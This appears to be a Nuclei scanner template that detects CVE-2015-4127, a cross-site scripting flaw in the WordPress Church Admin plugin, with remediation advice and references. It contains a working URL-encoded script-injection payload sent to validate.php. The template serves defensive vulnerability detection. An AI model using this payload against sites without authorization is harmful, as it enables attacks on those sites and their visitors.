id: CVE-2015-4127 info: name: WordPress Church Admin <0.810 - Cross-Site Scripting author: daffainfo severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. impact: | Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/37112 - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 epss-percentile: 0.71383 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: "church_admin_project" product: "church_admin" framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'Church Admin =' - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100b2bba005d286e24c95a6dfe796e8786b5c85cd27546075c7a065f17cdda0e812022100bf92e40b7701ce29e61ebadda71943ffdeba45f4eff6b0c653f0e01bf542ff88:922c64590222798bb761d5b6d8e72950